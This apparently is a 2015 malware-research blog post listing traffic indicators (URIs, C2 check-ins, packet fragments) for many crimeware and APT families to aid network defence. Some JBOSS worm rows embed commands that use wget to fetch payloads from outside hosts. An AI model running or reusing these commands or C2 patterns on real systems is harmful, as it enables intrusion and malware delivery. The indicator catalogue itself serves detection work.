Thursday, February 5, 2015

Library of Malware Traffic Patterns


Update February 2015 
Use the new link below for a new interface and updates.

Traffic analysis has been the primary method of malware identification and thousands of IDS signatures developed are the daily proof. Signatures definitely help but ability to visually recognize  malware traffic patterns has been always an important skill for anyone tasked with network defense. The number of malware analysis blogs and papers is overwhelming and it is difficult to keep track of malware features if you don't have access to a well designed and constantly updated malware database. This started as "personal notes" spreadsheet with GET and POST requests for different malware families with information from open sources. We decided others might find it useful too.

Click on the column headers to see recent entries. Use other column headers to sort as needed. Wait a few seconds for the table to load from the Google Sheet. URI and User-Agent fields might have spaces for easier cell wrapping. Remove them if you export the data.
Yes, you can download samples mentioned in the spreadsheet. See the "dl" column in the full spreadsheet table and corresponding links to the download location. Use "Contagio" password scheme (email Mila or admin at deependresearch.org)
Image credit: Jay Walker Library. Src.Vancouversun

VIEW OR DOWNLOAD "MALWARE TRAFFIC PATTERNS"

 List of malware families and available downloads for their samples, pcaps (click on the link above for the full post)



typefamilymethoduri
CRIMECarberb / /GluptebaGET/get_ads.php?yy=1&aid=2&atr=exts&src=199
/go/p1011105.subexts
/go/page/landing_page_68?nid=14&layout=qna&pid= p1011105.subexts&ip=auto&no_click=1&alpo_redirect=1
/javascript/live_cd/popunder_script-1400195675.js
/images/ffadult/css/header.css
/css/live_cd/ffadult/chinese/0/global_facelift-1414007370.css
CRIMEFiesta EKGET/?_SPMq=vahK1gfvq3&z1_Aj =fW8sL8ld&nkPgy= 81S8Y0_&0Us9=dr_fSq3Jai&w7Eaf= fu5dv5&wDK9=Ydqk1z4o6&52YRK=eHl9jdJ8j&I86 __=He0S4m9G
&QPy3i=J4HP58S7h&dRPS8=7bi7Y
/?3W_wN=I40_W5_&eht =t8vP8M8L&2ad_uO= 33KPa&_s3oi=8P5_7&QLfo= cHai8w&ZM7P_K=bSG7TH3p&UKb38= 1s4wx2s&jSJyB=cM7c
/?sk9=7ufJ8Ky7H8nS34n7f1h8t887R49&eDf= 1foPbZaw1VcxcHlfJdVw83P69hP1uSdYbR
/?_I4XS=idKbueq4kR1q8&0TsZ= Y0Wn7Lbr6K9hch&thXvW=56WPaqG2OdJ0&Ff_lty= x21dbrs8y5
/?m_FxE=eh0&MkFq=H8GeS&fz7= 1l3&d2T6r=ae&LeH_9= k0Il2W&Z7i6=3S1&7h_ =Sdlc&zmGAU=i0uf&mMwf=ehp5p& ymV7T=y7lKe&Jpk_DF=_5_2
CRIMEFiesta EKGET/yzzzpiehxpvij8ps46znskyaqfa5ijkduakhxwcbj9
/ai_qkvu2/4a374fcc5b4966050058040c015d5253005 2030f0f5201530f54070e0507525450;118800;94
/ai_qkvu2/074f70a95a1651de5952585d020b5009040 4045e0c0403090b02005f0651500e54
CRIMEGongdad / Gong Da compromised site redirectsGET/pg/kcp/index.html
/popup/index.html
/my/by4.html
CRIMEGongdad / Gong Da EKGET/data/file/cr/index.html
/data/file/cr/swfobject.js
/data/file/cr/jquery-1.4.2.min.js
/data/file/cr/main.html
/data/file/cr/AyVpSf.jar
/data/file/cr/com.class
/data/file/cr/edu.class
/data/file/cr/net.class
/data/file/cr/org.class /windos.exe
CRIMEDalexis LoaderGET/tmp/pack.tar.gz
/assets/pack.tar.gz
/piwigotest/pack.tar.gz
/histoiredesarts/pack.tar.gz
/fit/pack.tar.gz
APTGholee / Rocket KittenGET / POST/index.php?c=Ud7atknq&r=17117d
/index.php?c=Ud7atknq&r=1710b2
CRIMEZemotGET/b/shoe
CRIMEZemot DL via AsproxGET/catalog/159
CRIMEZemot downloading RovnixGET/mod_jshopping_products_gdle/mod_smartslider2/
CRIMEZemot downloading RerdomGET/mod_jshoppi/soft32.dl
CRIMERerdomGET/b/eve/
CRIMEClickfraudGET/b/req/
CRIMECidox / Rerdom / ClickfraudGET/b/eve/e91425775cc5d7e657bd2cc7
/b/letr/21D84379F768D95442B92BC5
/b/opt/E1805AD5D79824076249D696
/b/req/FDD953BA382388758DF27AE4
/b/pkg/
CRIMECidox / Rerdom / Clickfraud - clickurl GETGET/x/48petqwk9//AA/0
CRIMECidox / Rerdom / Clickfraud - clickurl GETGET/2014/06/26/new-game-tech-behind-scenes-sony -playstation with referrer http://controller-best.com
APT / CRIMEScieron / Httneilc / HTClientpacket data 0000 16 03 01 00 41 01 00 00 3d 03 01 54 c1 2a fa 82
0010 a5 0b 00 4c 7b 26 c9 33 81 bd 63 34 08 ab b3 38
0020 3a de 83 db b1 9c 95 02 3e c3 34 00 00 16 00 04
0030 00 05 00 0a 00 09 00 64 00 62 00 03 00 06 00 13
0040 00 12 00 63 01 00
CRIMEZollard RFIPOST/cgi-bin/php? %2D%64+%......%2D%6E
CRIMEUpatreGET/js/jquery-1.41.15.js
/js/jquery-1.41.15.js?aCNDrnl3=[user-agent string]&hjmcSOLrVb5fK5a =1846&kZuJV1OyPrXdK0= 1267859342&OjyOcmABhJHuu=gDyC5hx734Wu1.js
/js/jquery-1.41.15.js?get_message=3290013886
CRIMECryptowall 3.0POSThttp://proxy1-1-1.i2p/fee4roy2hih9
http://payto4gtpn5czl2.torforall.com/ofs20c
CRIMEAndromedaPOST/ldr.php
CRIMEAngler EK ChainGET/t19jl0hvv2.php
CRIMEAngler EK ChainGET/752s2n0ndw.php
CRIMEAngler EK ChainGET/erL0pIvz9_wyAlk2koy7L4b2qScYutODp2Cm dYZyW hw1bW9lGM8EDW8cKKjx47cp
CRIMEAngler EK ChainGET/P-SqI9OgILhp9clsf2ne5wgWHy4i2ew2hy 48WScNKA 9m2DKeiJNTp7gSxYSPcXsN
CRIMEAngler EK ChainGET/models/runway/ring/header.js
CRIMEAngler EK ChainGET/code/decrease/revenue/core.js
CRIMEAsprox / KuluozGET/include.php?t=20lB5S+e4qW48vWs/RXbneRWTR9t JTB67xoumOnEvak=
HTTPS over port 443 as a possible connectivity check
CRIMEAsprox / KuluozPOST/index.php
CRIMEChanitorPOST/gate.php
CRIMEChanitor DownloadsGET/wp-includes/js/tinymce/plugins/wpfullscreen/1.php
/wp-includes/js/tinymce/skins/lightgray/1.php
/wp-content/plugins/motopress-content-editor /flexslider/fonts/1.php
/wp-includes/js/tinymce/plugins/wpfullscreen/1.php
CRIMECryptowallPOST/532boskc3i0
/nvebi4m4ggdokz
/wbkljtzpimbryt
CRIMECryptowallGET/wp-content/themes/exiportal/dh5x3a1815j
/wp-content/themes/esther/6l7de
CRIMEDridex payloadGET/mopsi/popsi.php
/js/bin.exe
CRIMEFake AV post compromiseGET/?0=13&1=1&2=15&3=i&4=7600&5=0&6=1111&7 =kyxnujmwnn
CRIMEFiesta EKGET/txf9p_v8/ye1PlchZ7X9pFcl0o-y3
/txf9p_v8/14dcb5b6b53272fd050d5358500e540100 0750585657520d0400060703005305 ;114402;287
/txf9p_v8/4dc239e53174afbc5d010f0901025302055 75709075b550e01500156520c5406
CRIMEFlashpack EKGET/sv62a76d18537/index.php
CRIMEGameThiefPOST/tj.asp
CRIMEGameThiefGET/count.asp?mac=8-0-27-8F-E3-EB&ComPut=Windows%20XP& iellq=IE:6.0.2900.5512&mrllq=iexplore&userid=jack
CRIMEGypothyGET/bigbight/kinkong.txt
CRIMEH-W0rmPOST/SpCoderHere
CRIMEKaiXin EKGET/indexindex/
/indexindex/gg.jpg
/indexindex/jquery-1.4.2.min.js
/indexindex/swfobject.js
/indexindex/main.html
/xzz1.exe
/indexindex/NlNwQh.jar
/indexindex/com.class
/indexindex/edu.class
/indexindex/net.class
/indexindex/org.class
CRIMEKovterPOST/9/form.php
/11/form.php
/w1/form.php
/1/feed.php
CRIMENuclear EKGET / POST/XhBWV0gBT08OVFVW.html
/AwoVGwxQAEcOVRleDlRTBgMFR0tUV1YOVFcAHA JDQUhXVlxUVgdOVRtA
/ABsJAkgKUURCGlYaShlWAAACQUJfV1RCGVYEBh 1GRlVLVEJLVgUBT0AONi0fCB0j
CRIMEPoweliksGET/query?version=1.7&sid=1101&builddate=201214&q= low+testosterone+in+men&ua= Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)&lang=en-US&wt=0&lr=0&ls=2
/query?version=1.7&sid=1101&builddate=201214&q= fast+weight+loss&ua= Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)&lang=en-US&wt=0&lr=0&ls=2
/query?version=1.7&sid=1101&builddate=201214&q= pain+in+knee+cap&ua= Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)&lang=en-US&wt=0&lr=0&ls=2
/query?version=1.7&sid=1101&builddate=201214&q= anti+aging+cream+for+men&ua= Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; I Trident/5.0)&lang=en-US&wt=0&lr=0&ls=2
CRIMERedirect to Fiesta EKGET/?iVXpY9be=J8v3ax4v1&V5=1lM9es5-U2&npv_F-g= aPp8X- 02- GbU&b-nd9=-2-7nwdGa9Y&_6nQ=Y90gT9oPejrdO &
m_h=bv_8fzs0m6H&Zg_-tWd=f-bj0I9sai&hfUK=b3
CRIMESweet Orange EKGET/admin4_account/mobile/movies.php?timeline=18
/bad/generic/help.php?state=39
/cnet/tmp/Indy_admin/investor.php?setup=20
/dbadmin/wp-admin/hex/help.php?state=33
/forums/example/screens/investor.php?setup=20
/gcc/tmp/bad/help.php?state=25
/ip/ch/investor.php?setup=20
/profiles/stat/movies.php?timeline=21
CRIMESweet Orange EKGET/printer.php?cover=1388&catalogp=4&links=423&speeches=171 &about=1836&arts=205&anal=1064
/printer.php?cover=1388&catalogp=4&links=423&speeches=171 &about=1836&arts=205&anal=1064&errfix=urepair
/printer.php?rates=1764&catalogp=4&pixel=294&speeches=171 &shows=2171&trans=867&misc=1087&urepair=errfix
/store.php?back=669&nav_m=75&sendmail=4&stats=1186 &logout=171&state=2215&CRIME=2249
/teen.php?corp=2718&what=2210&soma=4&apps=1014 &pipermail=171&intl=783&best=535
/teen.php?corp=2718&what=2210&soma=4&apps=1014 &pipermail=171&intl=783&best=535&repfix=fixutil
/teen.php?cpan=2441&soma=4&subs=2093&pipermail=171 &feed=2093&film=663&comp=954
/serial.php?help=805&browsers=4&about=2398&icons=171 &music=247&sony=430&work=2315
CRIMETBDPOST/store/
CRIMETBD Post FlashpackGET/r?q=wrestling&subid=4699&link= kkCguKA.EeSIskSKW9RPYQ
/search?q=wrestling&subid=4699
/click?q=wrestling&subid=4699&link= kkCguKA.EeSIskSKW9RPYQ
CRIMETBD Proxy (Htbot?)GET/ocfg.php?command=getip
/ocfg.php?command=getid
/ocfg.php?command=ghl&id=1493496
/ocfg.php?command=dl&id=1493496
/ocfg.php?command=version&id=1493496
/ocfg.php?command=getbackconnect
/pointer.php?proxy=%3A24635&secret=BER5w4evtjszw4MBRW
CRIMEUpatreGET/1501us22//0/51-SP3/0/
/1501us22//1/0/0/
/2807cw//1/0/0/
/2807cw//41/5/4/
/2807cw//0/51-SP2/0/
/1201uk1//1201uk1//0/51-SP3/0/
/1201uk1//1/0/0/
/1201uk1//41/7/4/ "
/2307stat//0/51Service%20Pack%202/0/
/2307stat//1/0/0/
/2307stat//41/5/4/
CRIMEVavtrak / NeverquestPOST/collection/0000004E/00/9EBD6132
CRIMEZeusGET/backup/config.bin
/en/images/config.bin
/guardnow/config.bin
/guardnow/config.bin
CRIMEZeusPOST/choosen/helps/file.php
CRIMEAdWare Kraddare.ILGET/bv/config.php?q=^/irW@RwOC6RKkFiJgWt_ESwGQKBP... ..@RwNPRwNN::
CRIMEAdWare Kraddare.ILPOST/bv/config.php
CRIMEDyreGET/2001uk11/HOME/1/0/0/
CRIMEDyreGET/mandoc/eula012.pdf
CRIMEDyreGET/mandoc/ml1from1.tar
CRIMEDyre plugin dlGET/ineede900.rar
CRIMEKazyGET/cmd/api.php?mk=20140708041847777&action= get_availability&partoffer_id=11229&a2=FR
CRIMEMudropGET/gcs?alpha=YBvfs8NDNYK3vSEO+ p6fL2KZts4yS8inp2oWpqiDOinE/IJmP6Ktx9+Px+c=
CRIMEChePro (Brazil.banker)GET/ini/xvwmmwb.mod
CRIMECryptolockerPOST/home/
CRIMEReedum220 ProFTPD 1.3.3a Server (Debian) [::ffff:109.234.159.254]
APTVidgrabPOST(172.16.253.130)|1067|WinXP|D|L|No| 0..0....1..52..|No|V2010-v24|2184|0|3111947|0|1|.
APTPage / stscout / Elise / lStudio / WuminsGET/29af9cdc/page_12082223.html
CRIMETijcontGET/s/blog_b2afd7fe01019tkf.htm
APTDarkcometGET/a.php?id=c2ViYWxpQGxpYmVyby5pdA==
CRIMEKelihosGET/index.htm
CRIMEKuluoz Run command from C2nc=run&u=/get/7d2c37d2070e1b38 6070db8c851dae08.exe&crc= 9e2b9c4f465 b765fc971423935c4b68e
APTnjRAT / Backdoor.LV lv|'|'|TndfQzQyNjRFQkI=|'|'|VICTIM|'|'| Examiner|'|'|2013-06-21|'|'|USA|'|'| Win XP ProfessionalSP2 ...

171.ll|'|'|Li4uLi4uLk5FVy4uLi4u Li4uX0F FNTJDMzdE|'|'|SENTA|'|'| sentai55|'|'|15-01-29|'|'||'|'| Win 8.1SP0 x64|'|'|Yes|'|'|0.7d| '|'|..|'|'||'|'|b88ece4c04f706 c9717bbe6fb da49ed2,132.inf|'|'|Li4uLi4uLk5FVy4uL i4uLi4uDQpyZWVlZWVk LmR5bmRucy5iaXo6M jUyNTQNCkFwcERhdGENCldpbnJhci5leG UNClRydWUNCkZhbHNlDQpU cnVlDQpGYWxzZQ==0.

251.ll|'|'|Li4uLi4uLk5FVy4uLi4uLi4uX0FFNTJD MzdE|'|'|SENTA|'|'|sentai55|'|'|15-01-29|'|'||'|'|Win 8.1SP0 x64|'|'|Yes|'|'|0.7d|'|'|..|'|'|QnVyd 2VsbCB2LiBIb2JieSBMb2JieSBBYnJpZGdlZCBbQ29tcGF0aWJpbGl0eSBNb 2RlXSAtIFdvcmQA|'|'|b88ece4c04f706c9717bbe6fbda49ed2,

lv|'|'|VHJvamFuX0M0NkY2RTk= |'|'|MARK|'|'|user |'|'|2013-11-22|'|'||'|'|Win XP|'|'|No|'|'|0.6.4|'|'|..|'|'||'|'|[endof]
CRIMEChimerka.1 / Refyes.APOST/sys.php
CRIMESalityGET/images/logos.gif?1f5428=8212640
CRIMENitedremGET/down.asp?action=install&u=cpmcpm&p= 2366A64BAA384EA6AB9CEF73E8E2BE12&t =7393
CRIMENitedremGET/upx/kod.txt?k=123&t=7215
CRIMENitedremGET...............2817324n-79s4-43q8-8n2n-676s3qr1ops5:...............
CRIMENitedremGET/config.txt?&t=4593
CRIMENitedremGET/fish.jpg?&t=4426
CRIMESalityGET/?12da89=12355930
CRIMESalityGET/images/logos.gif?114bbc=9068000
CRIMESalityGET/setting.doc
CRIMETorpig /Sinowal miniloaderGET/
CRIMETorpig /Sinowal miniloaderGET/search2?fr=altavista&itag=ody&q= b88d6ce7e9fe419788716298cc747adc %2C93a5d8146fea0bbb&kgs=1&kls=0
CRIMEEK PopadsGET/?7d456d68729292e9843cb9dde2d2f7b4=34
CRIMEEK PopadsGET/4d23ccceb2cf9e6c1c91df06170259d3/32cd ad27bdec4a68d8efc9bb835008e6.swf
CRIMEEK PopadsGET/855feed4acbb99c63ad7f25fef289284/decaff5b6ee 641742f53d8ef8c6f9a16.jar
CRIMEEK PopadsGET/?c480cfaa684e1dc0db1b2e1f891d814a= a15&8524421677ca0f8c20fd1cd2c1c6e0a7=sansit.in
CRIMEEK PopadsGET/39ff9ff8c3b603d8eed017df64dd2799.eot
CRIMEAlina POS v5.6POST/duck/push.php
CRIMEAlina POS v5.6POST/adobe/version_check.php
CRIMEAlina POS v6.0POST/adobe/version_check.php
APT (IN)Hanove / TouristPOST/kamp.php
APTSurtr 2nd Stage DL00000000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
APTSurtr 2nd Stage DL00000000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
APTSurtr Initial GET00000000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
APTTaleretGET/
APTTaleretGET/jw!Dyz0_2mTExQ0xbBnlp.RZcXoHmU-
CRIMESweet Orange EKGET/in.php?q=WPOChVXlw9QiOTwtCbg+ uSk36elyOCiUwI99U0PYxA==
CRIMEArcomRat / DokstormacPOSTS_0001[!^]NEW[!^]127.0.0.1[!^]COMPUTERNAME[!^] username[!^]XP[!^]V1.3[!^]IDLE TIME[!^]Active Caption [!^]SPiBlnbspkvj6DQ5dnFrtvvJvNT4a8Y[!^]NO[!^]NO[!^]NO[!^][!^]
CRIMEArdamax keyloggerSMTP220 smtp.mail.yahoo.com ESMTP ready
EHLO DELLXT
250-smtp.mail.yahoo.com
CRIMEMatsnu - MBR wiping ransomwarePOST/f44/myse.php
CRIMEMutopy DownloaderGET/d/conh11.jpg
CRIMEMutopy Downloader initial callbackGET/protocol.php?p=3894120584&d=4fQm27CpL9m6oC7 QvLZomrXyeYvptmyetaVE2deiLdi4
CRIMESymmi Remote File InjectorGET/img/seek.cgi?lin=100&db=dfs
/ae1.php
/ggu.php
/wp-content/gallery/28-juli-sundsore/options.php [wordpress url - varies
CRIMEMatsnu - MBR wiping ransomwareGET/inbox.php?ltype=ld&ccr=1&id=E81B90884C4C45445458 &stat=0&ver=2000803&loc=0x0409&os=Windows%20XP
CRIMEAdware HotbarPOST/vic.aspx?ver=4.0.1158.0&rnd=595937
CRIMEBlackhole v2GET/7fc107b56efd7920/7fc107b56efd7920/q.php?kf=1f:1o:1m:2 w:1o&he=1i:31:32:1g:1n:1h:1l:1l:1n:31&a= 1f&zg=c&tn=g&jopa=1658622
CRIMEUSteal.D220---------- Welcome to Pure-FTPd ----------
APTHangover Smackdown MinaproGET/flaws/snwd.php?tp=1&tg=[ID]&tv=Error[]&ts= [PLATFORM]&mt=[account]&tr=[NoFiles]&Y1Y5F2
CRIMECutwail / PushdoPOST/?ptrxcz_VYadfikmqsuxz2469BEGILNPSUXZbe
APTMediana ProxyGET/index.htm?n763t4OPmrs6fXq7fXp7uj16e-r&Length=0
CRIMEZeusPOST/orders2010.php
/busted.php
CRIMEGypthoyPOST/opt/mainpage.php
APTHupigon / Graybird........................................;... Windows XP 5.1 (2600.Service Pack 3).......................... ......................................$...DELLXT.................................... .................................... ........................................... 4s.love.......HACK..
APTVariant Letsgo / TabMsgSQL downloader (comment crew)GET/index.htm
APTTapaouxGET/ol/yahoo/banner4.php?jpg=../yahoo
CRIMEHorst ProxyGET/socks/proxy.php?ip=172.16.253.129&port= 41080&os=XP&iso=USA&smtp=0
CRIMEPassAlertGET/loader/bin/file1.exe
CRIMEBitcoinminerPOST/
CRIMEKaragany LoaderGET/user/go.php?html=do
APTGh0stGh0st....d...x.Kc``....@....\..L@:8..,39U! 1
APTIXESHEGET/AWS96.jsp?baQMyZrdI5Rojs9Khs9fhnjwj/8mIOm9j OKyjnxKjQJA
x_bigfix_client_string: baQMyZrdqDAA
APT2KoreanBanker DLGET/web/down/kbs.exe
APTPlugxSSL - see http://4.bp.blogspot.com/-m2u0QTwirDk/UYO4 6Pm7OOI/AAAAAAAAAFw/SG_eKhd1-Nw/s640/Untitled.png
CRIMEPowerLoaderPOST/postnuke/blog.php
APTRssFeeder (moved from TBD tab, common name still unknown) 2nd stagePOST/orange/news.php
APTRssFeeder (moved from TBD tab, common name still unknown) initialGETPOST/data/rss
APTSwamiGET/im/linux.php
CRIMEGameThiefGET/xx/get.asp?mac=7641FAC9F7B2AAF71B6DE505B4 D468A2&os=winxp%20 Professional&avs=unknow&ps=NO.&ver=0005&pnum=16
CRIMEBeebone downloaderGET/0/?f|-1813912965Admin
/a/76876332/1
CRIMENeutrino EK varPOST/cxiqocvbqd
APTComfoo / Vinself / MspubPOST/BmYBcnhwJxwk/VTlaMWlnYEw12511/18688/ 12AzAONjkCYw/UD1aND43a0xiWQ161/
APTDestory Rat / Sogu / ThoperPOST/update?id=000f72b8
APT2Disttrack / ShamoonGET/ajax_modal/modal/data.asp?mydata=AA== &uid=aaa.bbb.ccc.ddd&state=3067203
CRIMEAvatar RootkitGET/search?query=EZTFDHWP&sort=relevance http://groups.yahoo.com/search?query=EFS9KHRF&sort=relevance
APT9002POST9002..................wx....9002..................wx....9002.......................
APTMSWab /YayihPOST/bbs/info.asp
CRIMEZeroAccess / SirefefGET/stat2.php?w=65&i=58d7f947d2d1f947e5de1a07e596ae05&a=25
/count.php?page=952000&style=LED_g&nbdigits=9
CRIMEZeroAccess / Sirefef ppc fraud - redirectGETHTTP/1.1 302 Moved Temporarily
APT9002POST/2d
CRIMEAsprox / Kuluoz gets list of C2sGET/4213D5182A41F58F3D01D8208B0BE9633A985A4C 35CE0496B63C66D43EDEC263C42FF3524188D067B0C443C0
CRIMEAsprox / Kuluoz CheckinGET/4213D5182A41F58F3D01D8208B0BE9633A985A4C 35C70A97FF61249661F38426DA71D12B40F9A512B 6C945CD85462CD565962B6C5CACB1B09F86B1651 EB971F3013D14695028FE0BEBD838B9D3C5DE002 EA95371E51B0E8CFB7567F6BF
CRIMEAsprox / Kuluoz GETs spam templateGET/78dc91f1D56B9COC18B818A7A2B272F43O3A621C AEOC17O479E4E9A69B82
CRIMECarberbPOST/kmqkcicalxrntrngwdxjyxztxcqkoyjn bdoafqirgnwwvpcjqglucovna.htm
CRIMEFakeAV var (via Kuluoz - Asprox botnet)GET/AFC392A9570E45C188F468429F6349E82ABF530D 32184946F872BB899FAECD808398A1630AEB78FE6EE44AB3 34A67A0A45B4ED8A690330E832085902F0146216 16CEB4AF702F4E5B37A9F53B21242F
APTFavoritesGET/download731106?h1= FIFEFDAHAPGDENCMFOFFFCAGAE
APTFavoritesGET/search?qu=
APTFavoritesGET/search59861?h1=51&h2=1&h3=BHI06233&h4=FIFEF DAHAPGDENCMFOFFFCAGAE
APTFavoritesGET/search613522?h1=FIFEFDAHAPGDENCMFOFFFCAGAE
APTFavoritesPOST/search25548?h1=FIFEFDAHAPGDENCMFNFFFNAGAH
APTFavoritesPOST/upload8806?h1=FIFEFDAHAPGDENCMFOFMFGAEAE
APTGh0stGET/cgi/online.asp?hostname= [COMPUTERNAME]&httptype=[1][not%20httptunnel]
APTGh0st varGET/h.gif?pid =113&v=130586214568 HTTP/ 1. 1
CRIMEGuntior - CN bootkitGET/yx/tongji.html
CRIMEKuluoz.B downloaderGET/index.php?r=gate&fq=acc0e9de&group=sl15&debug=0
CRIMERanbyus / Triton (Spy, Banking, smart cards)POST/releases/index.php
CRIMEUrausy (Ransomware)GET/ixjxqn-jtixjx-qnjt_tfdhgj-opjx-gxytfqbqgsusltnojtyhsn_syvrzh-htof-clgowkblrzrqfrgsuqgdit_ruky_.php
APTGlassesGET/ewpindex.htm
APTIEXPLORE Rat / C0D0S0 /Briba / Cimuz / SharkyRATPOST/index000000001.asp
APTLURKGETLURK0........x.kf.e.apgpbpa0c..#........
APTDNSWatch / ProtuxGET/dns/dnslookup?la=en&host=picture.ucparlnet. com&type=A&submit=Resolve
APTDNSWatch / ProtuxGET/news.jpg
APTDNSWatch / ProtuxPOST/PHqgHumeay5705.mp3
CRIMEAndromedaPOST/new/gate.php
CRIMECitadelPOST/g.php
CRIMECitadel (Zbot var)POST/C270suqdh/file.php
CRIMEPony loaderPOST/ponyb/gate.php HTTP/1.0
CRIMEReedumGET220 ProFTPD 1.3.3a Server (Debian) [::ffff:109.234.159.254]
APTAPT1 WEBC2_RAVEGET/comp/sem/resources.htm
APTbackdoor ?GET/18110123/page_32262 308.html
APTBanechant 1GET/IGKKT
APTBanechant payload dl 2GET/adserv/logo.jpg HTTP /1.1
APTBeebusGET/windosdate/v6/default.aspx?ln=en-us
APTBeebus C2 checkinGET/s/asp?XAAAAM4w5jmIa_kMZlr67o8jettxsYA8dZge NAHes-Nn5p-6AFUD6yncpz5AL6wAAA==p=1
APTBeebus C2 checkinGET/s/asp?XAAAAM4w5jmOS_kMZlr67o8jettxsYA8d ZgeNAHes-Nn5p-6AFUD6yncpz5AL6wAAA==p=1
APTBeebus data sendPOST/s/asp?__ uLBwO1bAMKBgG2BQAAAAEAAAACAAAAAAAAAG9zYW11 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA VwBJAE4ARABPAFcAUwBNAEEAQQBOAEU AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAA==p=2
CRIME EKBlackhole 2GET/fded177fe12651bb038f3f11b01c4168/q.php
APTCookies /Cookiebag / DalbotGET/1799.asp
APTCookies /Cookiebag / DalbotGET/3961.html
Cookie: Y29tbWFuZD1HZXRDb21tYW5kO2NsaWVudGtle T0zOTU0 O2hvc3RuYW1lPXZpY3RpbTs=
APTCookies /Cookiebag / DalbotGET/8223.asp (also can be like /2007.asp,/2013.asp etc
APTCookies /Cookiebag / DalbotGET/indexs.zip
APTCoswidGET/old/google.png
APTCVE-2012-0754 SWF in DOCGET/test.mp4
APTCVE-2012-0779GET/essais.swf?info=789c333230d13331d53337d63 3b3b432313106001afa0338&infosize=00FC0000
CRIMEDarkmegiGET/20111230.jpg
CRIMEDarkness DDos v8gGET/index.php?uid=587609&ver=8g%20XP
APTDepyotGET/new/3d/d/pdf.php?id=2
APTDestory Rat / Sogu / ThoperPOST/update?id=000f6b50
APTDestory Rat / Sogu / ThoperPOST/update?id=3109c2a2
APTDestory Rat / Sogu / ThoperPOST/update?product=windows
CRIMEDirtJumper DDoSPOST/678/index.php
CRIMEDirtjumper ddosPOST/boi854tr4w.php
CRIMEDNSChangerPOST/d56sc1d56scd56sc1.php?ini= v22Mmjy0SYXyWTI0tQ0QQOdqOb68 J9I6ModWQnN1eE1VXw/T3BWOyTujBlrHIQqMgMqV75 0QegiB MF4XAHPzbYqRtufQpaX/M/trvO7ukg==
APTDownloader BMPGET/images/evil.bmp
APTEinsteinGET/gttfi.php?id=019451425260376469&ext =YmFkc3R1ZmYuZGxs
APTEinstein data sendPOST/gttfi.php?id=019451425260376469& ext=ixioJXXJFCRrrDatKHhK
CRIME EKEK - Blackhole 2 landingGET/news/default-php-version.php?mdm=30:1g:2v:1f:1o& xguc= 3b:3i:39: 35&nze=1l:1f:30:1l:2v:30:1m:2v:1n:30&bhn=lixvdd
CRIME EKEK Blackhole 1GET/showthread.php?t=d7ad916d1c0396ff
CRIME EKEK PhoenixGET/navigator/jueoaritjuir.php
APTEnfal / LuridGET/oi2c/wlc3/ [reducted]:00-00-00-00-00-00/ij83d
APTEnfal / LuridGET/trandocs/nm/.[reducted] :00-00-00-00-00-00lCrrrwhite
APTEnfal / LuridPOST/cgi-bin/CMS_SubitAll.cgi
APTEnfal / LuridPOST/cgl-bin/Owpq4.cgi
APTEnfal / LuridPOST/Sjwpc/odw3ux
CRIMEFlashback OSXGET/statistics.html
APTFoxyPOST/404error.asp
APTFoxy CheckinGET/images/leftnav_prog_bg.jpg
APTGh0st ASP verGET/1/v2/1oginv2.asp?hi2wsdf351&x.’..[xf)..<.3XqHr....)IL{..&y192.168.0.69
APTGh0st PHP verGET/ld/queenfun/vl /login.php?cd2hpdGU&uU11T VEV&s&pMTkyLjE2OC4wljYS&hi2wsdf35l
APTGh0st v2000 varnv2010........f...............(
......Service Pack 2..?..|...|...|0.@..
APTGoogleAdC2GET/html/lost.html
APTGoogleAdC2 2nd stageGET/Trojan2.jpg
APTGooglesGET/sll/monica.jpg
APTGreencatGET//
APTGtalkGET/facebook.png
HacktivismHOIC DDoSGET/ HTTP/1.0
CRIMEImautGET/setting.doc
CRIMEIRCbotGET/check_ver.php?version=1.09
APTIXESHEGET/AWS26329.jsp? UrFvwIJIOKTRyfxR9KNRqhg8lcPr/ CGjUwP8y JUs7RjH7OinJ/85cgrqiP8jKGjpqgb/
wTrO7OIjhxoHcGaFa URqK/aHophHLd23K=NHk= a9oQ hvDQaLky8qo/RnJz42A
APTIXESHE AESGET/AES210001 129016878.jsp?UrFwUIO3h7ofgw QInYPRbkQaHVM9Bih7kZ9rO+pKUrbklllsgfOk=
+LLQhpkZ9LOhGbgqvJghHci7M
CRIMEJBOSS wormGET/zecmd/zecmd.jsp?comment=perl+lindb.pl
CRIMEJBOSS wormGET/idssvc/idssvc.jsp?comment= wget+http://webstats.dyndns.info/javadd.tar.gz
CRIMEJBOSS wormGET/iesvc/iesvc.jsp?comment=wget+http://magicstick.dyndns-remote.com/kisses.tar.gz
APTLetsgo / TabMsgSQLGET/indexbak.asp?rands= IXLCGIXELZ&acc=&str= select%20id%20from %20tab_online%20 where%20regc
ode%20=%20'IXLCGIXELZ'
APTLetsgo / TabMsgSQLGET/safe/1.asp?rands=DWLLOXLGLH&acc=vy&str= select%20top%201%20%20
from%20tab_message%20where%20toid%20= %20'198'%20order%20by%20id%20asc
APTLetsgo / TabMsgSQLGET/safe/1.asp?rands=XJOTLVALQF&acc=vy&str= insert%20into%20tab_online%20
(mode,clientname,clientip,accessip,onlinetime, lasttime,regcode)%20values%20
('0','victim','192.168.1.12','145.42.112.19', '2011-06-08%2013:45:54',
'2011-06-08%2013:45:54','NMQVPTXFBH')
APTLetsgo / TabMsgSQL downloaderGET/new/iistart.html
APTLikseputGET/index.html
APTLingbo (?)POST/windowsupdatev7/search%3 Fhl%3cWABQAFMAUAAzACOAUgA5 ADMALQBPAEYAQwAyADAA%26q%3DMQA3ADI ALgAyADkALgAwAC4AM
>QAxADYA%26 meta%3DMDAwMGhIÆÑuMDk %3D%26id%3Dlfdxfircvscxggb
APTLuckycat - WIMMIEPOST/count/count.php?m=c&n=[HOSTNAME]_
CRIMEMedfosGET/uploading/id=1888546865&u= 4WWbvjA+sJYdYzrNmxr7vmGjfIZ4m ztoS3uBwEbXacviRtjYIg2xcKQMAWYaZM 4RqxalcusDRHEOWDjvdOj3ww==
